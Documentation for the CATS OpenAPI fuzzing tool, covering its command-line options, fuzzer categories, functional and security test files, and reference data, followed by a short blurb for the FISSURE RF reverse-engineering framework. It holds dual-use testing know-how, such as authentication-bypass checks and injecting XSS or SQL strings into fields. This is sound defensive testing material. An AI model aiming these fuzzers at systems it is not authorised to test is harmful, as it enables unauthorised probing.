If true
(default value when not supplied) then CATS will use examples supplied in the OpenAPI contact. If false
CATS will rely only on generated values--checkFields
If supplied (no value needed), it will only run the Field Fuzzers--checkHeaders
If supplied (no value needed), it will only run the Header Fuzzers--checkHttp
If supplied (no value needed), it will only run the HTTP Fuzzers--includeWhitespaces
If supplied (no value needed), it will include the Whitespaces Fuzzers--includeEmojis
If supplied (no value needed), it will include the Emojis Fuzzers--includeControlChars
If supplied (no value needed), it will include the ControlChars Fuzzers--includeContract
If supplied (no value needed), it will include ContractInfoFuzzers
--sslKeystore
Location of the JKS keystore holding certificates used when authenticating calls using one-way or two-way SSL--sslKeystorePwd
The password of the sslKeystore
--sslKeyPwd
The password of the private key from the sslKeystore
--proxyHost
The proxy server's host name (if running behind proxy)--proxyPort
The proxy server's port number (if running behind proxy)--maxRequestsPerMinute
Maximum number of requests per minute; this is useful when APIs have rate limiting implemented; default is 10000--connectionTimeout
Time period in seconds which CATS should establish a connection with the server; default is 10 seconds--writeTimeout
Maximum time of inactivity in seconds between two data packets when sending the request to the server; default is 10 seconds--readTimeout
Maximum time of inactivity in seconds between two data packets when waiting for the server's response; default is 10 seconds--dryRun
If provided, it will simulate a run of the service with the supplied configuration. The run won't produce a report, but will show how many tests will be generated and run for each OpenAPI endpoint--ignoreResponseCodes
HTTP_CODES_LIST a comma separated list of HTTP response codes that will be considered as SUCCESS, even if the Fuzzer will typically report it as WARN or ERROR. You can use response code families as 2xx
, 4xx
, etc. If provided, all Contract Fuzzers will be skipped.--ignoreResponseSize
SIZE_LIST a comma separated list of response sizes that will be considered as SUCCESS, even if the Fuzzer will typically report it as WARN or ERROR--ignoreResponseWords
COUNT_LIST a comma separated list of words count in the response that will be considered as SUCCESS, even if the Fuzzer will typically report it as WARN or ERROR--ignoreResponseLines
LINES_COUNT a comma separated list of lines count in the response that will be considered as SUCCESS, even if the Fuzzer will typically report it as WARN or ERROR--ignoreResponseRegex
a REGEX that will match against the response that will be considered as SUCCESS, even if the Fuzzer will typically report it as WARN or ERROR--tests
TESTS_LIST a comma separated list of executed tests in JSON format from the cats-report folder. If you supply the list without the .json extension CATS will search the test in the cats-report folder--ignoreResponseCodeUndocumentedCheck
If supplied (not value needed) it won't check if the response code received from the service matches the value expected by the fuzzer and will return the test result as SUCCESS instead of WARN--ignoreResponseBodyCheck
If supplied (not value needed) it won't check if the response body received from the service matches the schema supplied inside the contract and will return the test result as SUCCESS instead of WARN--blackbox
If supplied (no value needed) it will ignore all response codes except for 5XX which will be returned as ERROR. This is similar to --ignoreResponseCodes="2xx,4xx"
--contentType
A custom mime type if the OpenAPI spec uses content type negotiation versioning.--outoput
The path where the CATS report will be written. Default is cats-report
in the current directory--skipReportingForIgnoredCodes
Skip reporting entirely for the any ignored arguments provided in --ignoreResponseXXX
> cats --contract=my.yml --server=https://locathost:8080 --checkHeaders
This will run CATS against http://localhost:8080
using my.yml
as an API spec and will only run the HTTP headers Fuzzers
.
To get a list of fuzzers run cats list --fuzzers
. A list of all available fuzzers will be returned, along with a short description for each.
There are multiple categories of Fuzzers
available:
Field Fuzzers
which target request body fields or path parametersHeader Fuzzers
which target HTTP headersHTTP Fuzzers
which target just the interaction with the service (without fuzzing fields or headers)Additional checks which are not actually using any fuzzing, but leverage the CATS internal model of running the tests as Fuzzers
:
ContractInfo Fuzzers
which checks the contract for API good practicesSpecial Fuzzers
a special category which need further configuration and are focused on more complex activities like functional flow, security testing or supplying your own request templates, rather than OpenAPI specsCATS
has currently 42 registered Field Fuzzers
:
BooleanFieldsFuzzer
- iterate through each Boolean field and send random strings in the targeted fieldDecimalFieldsLeftBoundaryFuzzer
- iterate through each Number field (either float or double) and send requests with outside the range values on the left side in the targeted fieldDecimalFieldsRightBoundaryFuzzer
- iterate through each Number field (either float or double) and send requests with outside the range values on the right side in the targeted fieldDecimalValuesInIntegerFieldsFuzzer
- iterate through each Integer field and send requests with decimal values in the targeted fieldEmptyStringValuesInFieldsFuzzer
- iterate through each field and send requests with empty String values in the targeted fieldExtremeNegativeValueDecimalFieldsFuzzer
- iterate through each Number field and send requests with the lowest value possible (-999999999999999999999999999999999999999999.99999999999 for no format, -3.4028235E38 for float and -1.7976931348623157E308 for double) in the targeted fieldExtremeNegativeValueIntegerFieldsFuzzer
- iterate through each Integer field and send requests with the lowest value possible (-9223372036854775808 for int32 and -18446744073709551616 for int64) in the targeted fieldExtremePositiveValueDecimalFieldsFuzzer
- iterate through each Number field and send requests with the highest value possible (999999999999999999999999999999999999999999.99999999999 for no format, 3.4028235E38 for float and 1.7976931348623157E308 for double) in the targeted fieldExtremePositiveValueInIntegerFieldsFuzzer
- iterate through each Integer field and send requests with the highest value possible (9223372036854775807 for int32 and 18446744073709551614 for int64) in the targeted fieldIntegerFieldsLeftBoundaryFuzzer
- iterate through each Integer field and send requests with outside the range values on the left side in the targeted fieldIntegerFieldsRightBoundaryFuzzer
- iterate through each Integer field and send requests with outside the range values on the right side in the targeted fieldInvalidValuesInEnumsFieldsFuzzer
- iterate through each ENUM field and send invalid valuesLeadingWhitespacesInFieldsTrimValidateFuzzer
- iterate through each field and send requests with Unicode whitespaces and invisible separators prefixing the current value in the targeted fieldLeadingControlCharsInFieldsTrimValidateFuzzer
- iterate through each field and send requests with Unicode control chars prefixing the current value in the targeted fieldLeadingSingleCodePointEmojisInFieldsTrimValidateFuzzer
- iterate through each field and send values prefixed with single code points emojisLeadingMultiCodePointEmojisInFieldsTrimValidateFuzzer
- iterate through each field and send values prefixed with multi code points emojisMaxLengthExactValuesInStringFieldsFuzzer
- iterate through each String fields that have maxLength declared and send requests with values matching the maxLength size/value in the targeted fieldMaximumExactValuesInNumericFieldsFuzzer
- iterate through each Number and Integer fields that have maximum declared and send requests with values matching the maximum size/value in the targeted fieldMinLengthExactValuesInStringFieldsFuzzer
- iterate through each String fields that have minLength declared and send requests with values matching the minLength size/value in the targeted fieldMinimumExactValuesInNumericFieldsFuzzer
- iterate through each Number and Integer fields that have minimum declared and send requests with values matching the minimum size/value in the targeted fieldNewFieldsFuzzer
- send a 'happy' flow request and add a new field inside the request called 'catsFuzzyField'NullValuesInFieldsFuzzer
- iterate through each field and send requests with null values in the targeted fieldOnlyControlCharsInFieldsTrimValidateFuzzer
- iterate through each field and send values with control chars onlyOnlyWhitespacesInFieldsTrimValidateFuzzer
- iterate through each field and send values with unicode separators onlyOnlySingleCodePointEmojisInFieldsTrimValidateFuzzer
- iterate through each field and send values with single code point emojis onlyOnlyMultiCodePointEmojisInFieldsTrimValidateFuzzer
- iterate through each field and send values with multi code point emojis onlyRemoveFieldsFuzzer
- iterate through each request fields and remove certain fields according to the supplied 'fieldsFuzzingStrategy'StringFieldsLeftBoundaryFuzzer
- iterate through each String field and send requests with outside the range values on the left side in the targeted fieldStringFieldsRightBoundaryFuzzer
- iterate through each String field and send requests with outside the range values on the right side in the targeted fieldStringFormatAlmostValidValuesFuzzer
- iterate through each String field and get its 'format' value (i.e. email, ip, uuid, date, datetime, etc); send requests with values which are almost valid (i.e. email@yhoo. for email, 888.1.1. for ip, etc) in the targeted fieldStringFormatTotallyWrongValuesFuzzer
- iterate through each String field and get its 'format' value (i.e. email, ip, uuid, date, datetime, etc); send requests with values which are totally wrong (i.e. abcd for email, 1244. for ip, etc) in the targeted fieldStringsInNumericFieldsFuzzer
- iterate through each Integer (int, long) and Number field (float, double) and send requests having the fuzz
string value in the targeted fieldTrailingWhitespacesInFieldsTrimValidateFuzzer
- iterate through each field and send requests with trailing with Unicode whitespaces and invisible separators in the targeted fieldTrailingControlCharsInFieldsTrimValidateFuzzer
- iterate through each field and send requests with trailing with Unicode control chars in the targeted fieldTrailingSingleCodePointEmojisInFieldsTrimValidateFuzzer
- iterate through each field and send values trailed with single code point emojisTrailingMultiCodePointEmojisInFieldsTrimValidateFuzzer
- iterate through each field and send values trailed with multi code point emojisVeryLargeStringsFuzzer
- iterate through each String field and send requests with very large values (40000 characters) in the targeted fieldWithinControlCharsInFieldsSanitizeValidateFuzzer
- iterate through each field and send values containing unicode control charsWithinSingleCodePointEmojisInFieldsTrimValidateFuzzer
- iterate through each field and send values containing single code point emojisWithinMultiCodePointEmojisInFieldsTrimValidateFuzzer
- iterate through each field and send values containing multi code point emojisZalgoTextInStringFieldsValidateSanitizeFuzzer
- iterate through each field and send values containing zalgo textYou can run only these Fuzzers
by supplying the --checkFields
argument.
CATS
has currently 28 registered Header Fuzzers
:
AbugidasCharsInHeadersFuzzer
- iterate through each header and send requests with abugidas chars in the targeted headerCheckSecurityHeadersFuzzer
- check all responses for good practices around Security related headers like: [{name=Cache-Control, value=no-store}, {name=X-XSS-Protection, value=1; mode=block}, {name=X-Content-Type-Options, value=nosniff}, {name=X-Frame-Options, value=DENY}]DummyAcceptHeadersFuzzer
- send a request with a dummy Accept header and expect to get 406 codeDummyContentTypeHeadersFuzzer
- send a request with a dummy Content-Type header and expect to get 415 codeDuplicateHeaderFuzzer
- send a 'happy' flow request and duplicate an existing headerEmptyStringValuesInHeadersFuzzer
- iterate through each header and send requests with empty String values in the targeted headerExtraHeaderFuzzer
- send a 'happy' flow request and add an extra field inside the request called 'Cats-Fuzzy-Header'LargeValuesInHeadersFuzzer
- iterate through each header and send requests with large values in the targeted headerLeadingControlCharsInHeadersFuzzer
- iterate through each header and prefix values with control charsLeadingWhitespacesInHeadersFuzzer
- iterate through each header and prefix value with unicode separatorsLeadingSpacesInHeadersFuzzer
- iterate through each header and send requests with spaces prefixing the value in the targeted headerRemoveHeadersFuzzer
- iterate through each header and remove different combinations of themOnlyControlCharsInHeadersFuzzer
- iterate through each header and replace value with control charsOnlySpacesInHeadersFuzzer
- iterate through each header and replace value with spacesOnlyWhitespacesInHeadersFuzzer
- iterate through each header and replace value with unicode separatorsTrailingSpacesInHeadersFuzzer
- iterate through each header and send requests with trailing spaces in the targeted header \TrailingControlCharsInHeadersFuzzer
- iterate through each header and trail values with control charsTrailingWhitespacesInHeadersFuzzer
- iterate through each header and trail values with unicode separatorsUnsupportedAcceptHeadersFuzzer
- send a request with an unsupported Accept header and expect to get 406 codeUnsupportedContentTypesHeadersFuzzer
- send a request with an unsupported Content-Type header and expect to get 415 codeZalgoTextInHeadersFuzzer
- iterate through each header and send requests with zalgo text in the targeted headerYou can run only these Fuzzers
by supplying the --checkHeaders
argument.
CATS
has currently 6 registered HTTP Fuzzers
:
BypassAuthenticationFuzzer
- check if an authentication header is supplied; if yes try to make requests without itDummyRequestFuzzer
- send a dummy json request {'cats': 'cats'}HappyFuzzer
- send a request with all fields and headers populatedHttpMethodsFuzzer
- iterate through each undocumented HTTP method and send an empty requestMalformedJsonFuzzer
- send a malformed json request which has the String 'bla' at the endNonRestHttpMethodsFuzzer
- iterate through a list of HTTP method specific to the WebDav protocol that are not expected to be implemented by REST APIsYou can run only these Fuzzers
by supplying the --checkHttp
argument.
Usually a good OpenAPI contract must follow several good practices in order to make it easy digestible by the service clients and act as much as possible as self-sufficient documentation:
json
types and propertiesPOST
, PATCH
and PUT
requestsCorrelationIds/TraceIds
within headersxml
payload unless there is a really good reason (like documenting an old API for example)Pet
with a property named pet
)CATS
has currently 9 registered ContractInfo Fuzzers
:
HttpStatusCodeInValidRangeFuzzer
- verifies that all HTTP response codes are within the range of 100 to 599NamingsContractInfoFuzzer
- verifies that all OpenAPI contract elements follow REST API naming good practicesPathTagsContractInfoFuzzer
- verifies that all OpenAPI paths contain tags elements and checks if the tags elements match the ones declared at the top levelRecommendedHeadersContractInfoFuzzer
- verifies that all OpenAPI contract paths contain recommended headers like: CorrelationId/TraceId, etc.RecommendedHttpCodesContractInfoFuzzer
- verifies that the current path contains all recommended HTTP response codes for all operationsSecuritySchemesContractInfoFuzzer
- verifies if the OpenApi contract contains valid security schemas for all paths, either globally configured or per pathTopLevelElementsContractInfoFuzzer
- verifies that all OpenAPI contract level elements are present and provide meaningful information: API description, documentation, title, version, etc.VersionsContractInfoFuzzer
- verifies that a given path doesn't contain versioning informationXmlContentTypeContractInfoFuzzer
- verifies that all OpenAPI contract paths responses and requests does not offer application/xml
as a Content-TypeYou can run only these Fuzzers
using > cats lint --contract=CONTRACT
.
You can leverage CATS super-powers of self-healing and payload generation in order to write functional tests. This is achieved using the so called FunctionaFuzzer
, which is not a Fuzzer
per se, but was named as such for consistency. The functional tests are written in a YAML file using a simple DSL. The DSL supports adding identifiers, descriptions, assertions as well as passing variables between tests. The cool thing is that, by leveraging the fact that CATS generates valid payload, you only need to override values for specific fields. The rest of the information will be populated by CATS
using valid data, just like a 'happy' flow request.
It's important to note that reference data
won't get replaced when using the FunctionalFuzzer
. So if there are reference data fields, you must also supply those in the FunctionalFuzzer
.
The FunctionalFuzzer
will only trigger if a valid functionalFuzzer.yml
file is supplied. The file has the following syntax:
/path:
testNumber:
description: Short description of the test
prop: value
prop#subprop: value
prop7:
- value1
- value2
- value3
oneOfSelection:
element#type: "Value"
expectedResponseCode: HTTP_CODE
httpMethod: HTTP_NETHOD
And a typical run will look like:
> cats run functionalFuzzer.yml -c contract.yml -s http://localhost:8080
This is a description of the elements within the functionalFuzzer.yml
file:
description
of the test. This will be set as the Scenario
description. If you don't supply a description
the testNumber
will be used instead.test1
, test2
, etc.expectedResponseCode
is mandatory, otherwise the Fuzzer
will ignore this test. The expectedResponseCode
tells CATS what to expect from the service when sending this test.prop7
has 3 values. This will actually result in 3 tests, one for each value.httpMethod
doesn't exist in the OpenAPI given path, a warning
will be issued and no test will be executedhttpMethod
is not a valid HTTP method, a warning
will be issued and no test will be executedoneOf
element to allow multiple request types, you can control which of the possible types the FunctionalFuzzer
will apply to using the oneOfSelection
keyword. The value of the oneOfSelection
keyword must match the fully qualified name of the discriminator
.oneOfSelection
is supplied, and the request payload accepts multiple oneOf
elements, than a custom test will be created for each type of payload#
as in the example above instead of .
When you have request payloads which can take multiple object types, you can use the oneOfSelection
keyword to specify which of the possible object types is required by the FunctionalFuzzer
. If you don't provide this element, all combinations will be considered. If you supply a value, this must be exactly the one used in the discriminator
.
As CATs mostly relies on generated data with small help from some reference data, testing complex business scenarios with the pre-defined Fuzzers
is not possible. Suppose we have an endpoint that creates data (doing a POST
), and we want to check its existence (via GET
). We need a way to get some identifier from the POST call and send it to the GET call. This is now possible using the FunctionalFuzzer
. The functionalFuzzerFile
can have an output
entry where you can state a variable name, and its fully qualified name from the response in order to set its value. You can then refer the variable using ${variable_name}
from another test in order to use its value.
Here is an example:
/pet:
test_1:
description: Create a Pet
httpMethod: POST
name: "My Pet"
expectedResponseCode: 200
output:
petId: pet#id
/pet/{id}:
test_2:
description: Get a Pet
id: ${petId}
expectedResponseCode: 200
Suppose the test_1
execution outputs:
{
"pet":
{
"id" : 2
}
}
When executing test_1
the value of the pet id will be stored in the petId
variable (value 2
). When executing test_2
the id
parameter will be replaced with the petId
variable (value 2
) from the previous case.
Please note: variables are visible across all custom tests; please be careful with the naming as they will get overridden.
The FunctionalFuzzer
can verify more than just the expectedResponseCode
. This is achieved using the verify
element. This is an extended version of the above functionalFuzzer.yml
file.
/pet:
test_1:
description: Create a Pet
httpMethod: POST
name: "My Pet"
expectedResponseCode: 200
output:
petId: pet#id
verify:
pet#name: "Baby"
pet#id: "[0-9]+"
/pet/{id}:
test_2:
description: Get a Pet
id: ${petId}
expectedResponseCode: 200
Considering the above file:
FunctionalFuzzer
will check if the response has the 2 elements pet#name
and pet#id
pet#name
has the Baby
value and that the pet#id
is numericThe following json response will pass test_1
:
{
"pet":
{
"id" : 2,
"name": "Baby"
}
}
But this one won't (pet#name
is missing):
{
"pet":
{
"id" : 2
}
}
You can also refer to request fields in the verify
section by using the ${request#..}
qualifier. Using the above example, by having the following verify
section:
/pet:
test_1:
description: Create a Pet
httpMethod: POST
name: "My Pet"
expectedResponseCode: 200
output:
petId: pet#id
verify:
pet#name: "${request#name}"
pet#id: "[0-9]+"
It will verify if the response contains a pet#name
element and that its value equals My Pet
as sent in the request.
Some notes:
verify
parameters support Java regexes as valuesCATs
will report an errorCATs
will report a warningCATs
will report a successYou can also set additionalProperties
fields through the functionalFuzzerFile
using the same syntax as for Setting additionalProperties in Reference Data.
The following keywords are reserved in FunctionalFuzzer
tests: output
, expectedResponseCode
, httpMethod
, description
, oneOfSelection
, verify
, additionalProperties
, topElement
and mapValues
.
Although CATs
is not a security testing tool, you can use it to test basic security scenarios by fuzzing specific fields with different sets of nasty strings. The behaviour is similar to the FunctionalFuzzer
. You can use the exact same elements for output variables, test correlation, verify responses and so forth, with the addition that you must also specify a targetFields
and/or targetFieldTypes
and a stringsList
element. A typical securityFuzzerFile
will look like this:
/pet:
test_1:
description: Run XSS scenarios
name: "My Pet"
expectedResponseCode: 200
httpMethod: all
targetFields:
- pet#id
- pet#description
stringsFile: xss.txt
And a typical run:
> cats run securityFuzzerFile.yml -c contract.yml -s http://localhost:8080
You can also supply output
, httpMethod
, oneOfSelection
and/or verify
(with the same behaviour as within the FunctionalFuzzer
) if they are relevant to your case.
The file uses Json path syntax for all the properties you can supply; you can separate elements through #
as in the example instead of .
.
This is what the SecurityFuzzer
will do after parsing the above securityFuzzerFile
:
name
targetFields
i.e. pet#id
and pet#description
it will create requests for each line from the xss.txt
file and supply those values in each fieldxss.txt
sample file included in the CATs
repo, this means that it will send 21 requests targeting pet#id
and 21 requests targeting pet#description
i.e. a total of 42 tests
SecurityFuzzer
will expect a 200
response code. If another response code is returned, then CATs
will report the test as error
.If you want the above logic to apply to all paths, you can use all
as the path name:
all:
test_1:
description: Run XSS scenarios
name: "My Pet"
expectedResponseCode: 200
httpMethod: all
targetFields:
- pet#id
- pet#description
stringsFile: xss.txt
Instead of specifying the field names, you can broader to scope to target certain fields types. For example, if we want to test for XSS in all string
fields, you can have the following securityFuzzerFile
:
all:
test_1:
description: Run XSS scenarios
name: "My Pet"
expectedResponseCode: 200
httpMethod: all
targetFieldTypes:
- string
stringsFile: xss.txt
As an idea on how to create security tests, you can split the nasty strings into multiple files of interest in your particular context. You can have a sql_injection.txt
, a xss.txt
, a command_injection.txt
and so on. For each of these files, you can create a test entry in the securityFuzzerFile
where you include the fields you think are meaningful for these types of tests. (It was a deliberate choice (for now) to not include all fields by default.) The expectedResponseCode
should be tweaked according to your particular context. Your service might sanitize data before validation, so might be perfectly valid to expect a 200
or might validate the fields directly, so might be perfectly valid to expect a 400
. A 500
will usually mean something was not handled properly and might signal a possible bug.
You can also set additionalProperties
fields through the functionalFuzzerFile
using the same syntax as for Setting additionalProperties in Reference Data.
The following keywords are reserved in SecurityFuzzer
tests: output
, expectedResponseCode
, httpMethod
, description
, verify
, oneOfSelection
, targetFields
, targetFieldTypes
, stringsFile
, additionalProperties
, topElement
and mapValues
.
The TemplateFuzzer
can be used to fuzz non-OpenAPI endpoints. If the target API does not have an OpenAPI spec available, you can use a request template to run a limited set of fuzzers. The syntax for running the TemplateFuzzer
is as follows (very similar to curl
:
> cats fuzz -H header=value -X POST -d '{"field1":"value1","field2":"value2","field3":"value3"}' -t "field1,field2,header" -i "2XX,4XX" http://service-url
The command will:
POST
request to http://service-url
{"field1":"value1","field2":"value2","field3":"value3"}
as a templatefield1,field2,header
with fuzz data and send each request to the service endpoint2XX,4XX
response codes and report an error when the received response code is not in this listIt was a deliberate choice to limit the fields for which the Fuzzer
will run by supplying them using the -t
argument. For nested objects, supply fully qualified names: field.subfield
.
Headers can also be fuzzed using the same mechanism as the fields.
This Fuzzer
will send the following type of data:
For a full list of options run > cats fuzz -h
.
You can also supply your own dictionary of data using the -w file
argument.
HTTP methods with bodies will only be fuzzed at the request payload and headers level.
HTTP methods without bodies will be fuzzed at path and query parameters and headers level. In this case you don't need to supply a -d
argument.
This is an example for a GET
request:
> cats fuzz -X GET -t "path1,query1" -i "2XX,4XX" http://service-url/paths1?query1=test&query2
There are often cases where some fields need to contain relevant business values in order for a request to succeed. You can provide such values using a reference data file specified by the --refData
argument. The reference data file is a YAML-format file that contains specific fixed values for different paths in the request document. The file structure is as follows:
/path/0.1/auth:
prop#subprop: 12
prop2: 33
prop3#subprop1#subprop2: "test"
/path/0.1/cancel:
prop#test: 1
For each path you can supply custom values for properties and sub-properties which will have priority over values supplied by any other Fuzzer
. Consider this request payload:
{
"address": {
"phone": "123",
"postCode": "408",
"street": "cool street"
},
"name": "Joe"
}
and the following reference data file file:
/path/0.1/auth:
address#street: "My Street"
name: "John"
This will result in any fuzzed request to the /path/0.1/auth
endpoint being updated to contain the supplied fixed values:
{
"address": {
"phone": "123",
"postCode": "408",
"street": "My Street"
},
"name": "John"
}
The file uses Json path syntax for all the properties you can supply; you can separate elements through #
as in the example above instead of .
.
You can use environment (system) variables in a ref data file using: $$VARIABLE_NAME
. (notice double $$
)
As additional properties are maps i.e. they don't actually have a structure, CATS cannot currently generate valid values. If the elements within such a data structure are essential for a request, you can supply them via the refData
file using the following syntax:
/path/0.1/auth:
address#street: "My Street"
name: "John"
additionalProperties:
topElement: metadata
mapValues:
test: "value1"
anotherTest: "value2"
The additionalProperties
element must contain the actual key-value pairs to be sent within the requests and also a top element if needed. topElement
is not mandatory. The above example will output the following json (considering also the above examples):
{
"address": {
"phone": "123",
"postCode": "408",
"street": "My Street"
},
"name": "John",
"metadata": {
"test": "value1",
"anotherTest": "value2"
}
}
The following keywords are reserved in a reference data file: additionalProperties
, topElement
and mapValues
.
You can also have the ability to send the same reference data for ALL paths (just like you do with the headers). You can achieve this by using all
as a key in the refData
file:
all:
address#zip: 123
This will try to replace address#zip
in all requests (if the field is present).
There are (rare) cases when some fields may not make sense together. Something like: if you send firstName
and lastName
, you are not allowed to also send name
. As OpenAPI does not have the capability to send request fields which are dependent on each other, you can use the refData
file to instruct CATS to remove fields before sending a request to the service. You can achieve this by using the cats_remove_field
as a value for the fields you want to remove. For the above case the refData
field will look as follows:
all:
name: "cats_remove_field"
You can leverage the fact that the FunctionalFuzzer
can run functional flows in order to create dynamic --refData
files which won't need manual setting the reference data values. The --refData
file must be created with variables ${variable}
instead of fixed values and those variables must be output variables in the functionalFuzzer.yml
file. In order for the FunctionalFuzzer
to properly replace the variables names with their values you must supply the --refData
file as an argument when the FunctionalFuzzer
runs.
> cats run functionalFuzzer.yml -c contract.yml -s http://localhost:8080 --refData=refData.yml
The functionalFuzzer.yml
file:
/pet:
test_1:
description: Create a Pet
httpMethod: POST
name: "My Pet"
expectedResponseCode: 200
output:
petId: pet#id
The refData.yml
file:
/pet-type:
id: ${petId}
After running CATS using the command and the 2 files above, you will get a refData_replace.yml
file where the id
will get the value returned into the petId
variable.
The refData_replaced.yml
:
/pet-type:
id: 123
You can now use the refData_replaced.yml
as a --refData
file for running CATS with the rest of the Fuzzers.
This can be used to send custom fixed headers with each payload. It is useful when you have authentication tokens you want to use to authenticate the API calls. You can use path specific headers or common headers that will be added to each call using an all
element. Specific paths will take precedence over the all
element. Sample headers file:
all:
Accept: application/json
/path/0.1/auth:
jwt: XXXXXXXXXXXXX
/path/0.2/cancel:
jwt: YYYYYYYYYYYYY
This will add the Accept
header to all calls and the jwt
header to the specified paths. You can use environment (system) variables in a headers file using: $$VARIABLE_NAME
. (notice double $$
)
DELETE
is the only HTTP verb that is intended to remove resources and executing the same DELETE
request twice will result in the second one to fail as the resource is no longer available. It will be pretty heavy to supply a large list of identifiers within the --refData
file and this is why the recommendation was to skip the DELETE
method when running CATS.
But starting with version 7.0.2 CATS has some intelligence in dealing with DELETE
. In order to have enough valid entities CATS will save the corresponding POST
requests in an internal Queue, and everytime a DELETE
request it will be executed it will poll data from there. In order to have this actually working, your contract must comply with common sense conventions:
DELETE
path is actually the POST
path plus an identifier: if POST is /pets
, then DELETE is expected to be /pets/{petId}
.{petId}
parameter within the body returned by the POST
request while doing various combinations of the petId
name. It will try to search for the following entries: petId, id, pet-id, pet_id
with different cases.POST
result, it will replace the {petId}
with that valueFor example, suppose that a POST to /pets
responds with:
{
"pet_id": 2,
"name": "Chuck"
}
When doing a DELETE
request, CATS will discover that {petId}
and pet_id
are used as identifiers for the Pet
resource, and will do the DELETE
at /pets/2
.
If these conventions are followed (which also align to good REST naming practices), it is expected that DELETE
and POST
requests will be on-par for most of the entities.
Some APIs might use content negotiation versioning which implies formats like application/v11+json
in the Accept
header.
You can handle this in CATS as follows:
requestBody:
required: true
content:
application/v5+json:
schema:
$ref: '#/components/RequestV5'
application/v6+json:
schema:
$ref: '#/components/RequestV6'
by having clear separation between versions, you can pass the --contentType
argument with the version you want to test: cats ... --contentType="application/v6+json"
.
If the OpenAPI contract is not version aware (you already exported it specific to a version) and the content looks as:
requestBody:
required: true
content:
application/json:
schema:
$ref: '#/components/RequestV5'
and you still need to pass the application/v5+json
Accept
header, you can use the --headers
file to add it:
all:
Accept: "application/v5+json"
There isn't a consensus on how you should handle situations when you trail or prefix valid values with spaces. One strategy will be to have the service trimming spaces before doing the validation, while some other services will just validate them as they are. You can control how CATS should expect such cases to be handled by the service using the --edgeSpacesStrategy
argument. You can set this to trimAndValidate
or validateAndTrim
depending on how you expect the service to behave:
trimAndValidate
means that the service will first trim the spaces and after that run the validationvalidateAndTrim
means that the service runs the validation first without any trimming of spacesThis is a global setting i.e. configured when CATS starts and all Fuzzer
expects a consistent behaviour from all the service endpoints.
There are cases when certain parts of the request URL are parameterized. For example a case like: /{version}/pets
. {version}
is supposed to have the same value for all requests. This is why you can supply actual values to replace such parameters using the --urlParams
argument. You can supply a ;
separated list of name:value
pairs to replace the name
parameters with their corresponding value
. For example supplying --urlParams=version:v1.0
will replace the version
parameter from the above example with the value v1.0
.
CATS also supports schemas with oneOf
, allOf
and anyOf
composition. CATS wil consider all possible combinations when creating the fuzzed payloads.
The following configuration files: securityFuzzerFile, functionalFuzzerFile, refData
support setting dynamic values for the inner fields. For now the support only exists for java.time.*
and org.apache.commons.lang3.*
, but more types of elements will come in the near future.
Let's suppose you have a date/date-time field, and you want to set it to 10 days from now. You can do this by setting this as a value T(java.time.OffsetDateTime).now().plusDays(10)
. This will return an ISO compliant time in UTC format.
A functionalFuzzer
using this can look like:
/path:
testNumber:
description: Short description of the test
prop: value
prop#subprop: "T(java.time.OffsetDateTime).now().plusDays(10)"
prop7:
- value1
- value2
- value3
oneOfSelection:
element#type: "Value"
expectedResponseCode: HTTP_CODE
httpMethod: HTTP_NETHOD
You can also check the responses using a similar syntax and also accounting for the actual values returned in the response. This is a syntax than can test if a returned date is after the current date: T(java.time.LocalDate).now().isBefore(T(java.time.LocalDate).parse(expiry.toString()))
. It will check if the expiry
field returned in the json response, parsed as date, is after the current date.
The syntax of dynamically setting dates is compliant with the Spring Expression Language specs.
If you need to run CATS behind a proxy, you can supply the following arguments: --proxyHost
and --proxyPort
. A typical run with proxy settings on localhost:8080
will look as follows:
> cats --contract=YAML_FILE --server=SERVER_URL --proxyHost=localhost --proxyPort=8080
CATS supports any form of HTTP header(s) based authentication (basic auth, oauth, custom JWT, apiKey, etc) using the headers mechanism. You can supply the specific HTTP header name and value and apply to all
endpoints. Additionally, basic auth is also supported using the --basicauth=USR:PWD
argument.
By default, CATS trusts all server certificates and doesn't perform hostname verification.
For two-way SSL you can specify a JKS file (Java Keystore) that holds the client's private key using the following arguments:
--sslKeystore
Location of the JKS keystore holding certificates used when authenticating calls using one-way or two-way SSL--sslKeystorePwd
The password of the sslKeystore
--sslKeyPwd
The password of the private key within the sslKeystore
For details on how to load the certificate and private key into a Java Keystore you can use this guide: https://mrkandreev.name/blog/java-two-way-ssl/.
When using the native binaries (not the uberjar) there might be issues when using dynamic values in the CATS files. This is due to the fact that GraalVM only bundles whatever can discover at compile time. The following classes are currently supported:
java.util.Base64.Encoder.class, java.util.Base64.Decoder.class, java.util.Base64.class, org.apache.commons.lang3.RandomUtils.class, org.apache.commons.lang3.RandomStringUtils.class,
org.apache.commons.lang3.DateFormatUtils.class, org.apache.commons.lang3.DateUtils.class,
org.apache.commons.lang3.DurationUtils.class, java.time.LocalDate.class, java.time.LocalDateTime.class, java.time.OffsetDateTime.class
At this moment, CATS only works with OpenAPI specs and has limited functionality using template payloads through the cats fuzz ...
subcommand.
The Fuzzers
has the following support for media types and HTTP methods:
application/json
and application/x-www-form-urlencoded
media types onlyPOST
, PUT
, PATCH
, GET
and DELETE
If a response contains a free Map specified using the additionalParameters
tag CATS will issue a WARN
level log message as it won't be able to validate that the response matches the schema.
CATS uses RgxGen in order to generate Strings based on regexes. This has certain limitations mostly with complex patterns.
All custom files that can be used by CATS (functionalFuzzerFile
, headers
, refData
, etc) are in a YAML format. When setting or getting values to/from JSON for input and/or output variables, you must use a JsonPath syntax using either #
or .
as separators. You can find some selector examples here: JsonPath.
Please refer to CONTRIBUTING.md.
Frequency Independent SDR-based Signal Understanding and Reverse Engineering
FISSURE is an open-source RF and reverse engineering framework designed for all skill levels with hooks for signal detection and classification, protocol discovery, attack execution, IQ manipulation, vulnerability analysis, automation, and AI/ML. The framework was built to promote the rapid integration of software modules, radios, protocols, signal data, scripts, flow graphs, reference material, and third-party tools. FISSURE is a workflow enabler that keeps software in one location and allows teams to effortlessly get up to speed while sharing the same proven baseline configuration for specific Linux distributions.
The framework and tools included with FISSURE are designed to detect the presence of RF energy, understand the characteristics of a signal, collect and analyze samples, develop transmit and/or injection techniques, and craft custom payloads or messages. FISSURE contains a growing library of protocol and signal information to assist in identification, packet crafting, and fuzzing. Online archive capabilities exist to download signal files and build playlists to simulate traffic and test systems.
The friendly Python codebase and user interface allows beginners to quickly learn about popular tools and techniques involving RF and reverse engineering. Educators in cybersecurity and engineering can take advantage of the built-in material or utilize the framework to demonstrate their own real-world applications. Developers and researchers can use FISSURE for their daily tasks or to expose their cutting-edge solutions to a wider audience. As awareness and usage of FISSURE grows in the community, so will the extent of its capabilities and the breadth of the technology it encompasses.
Supported
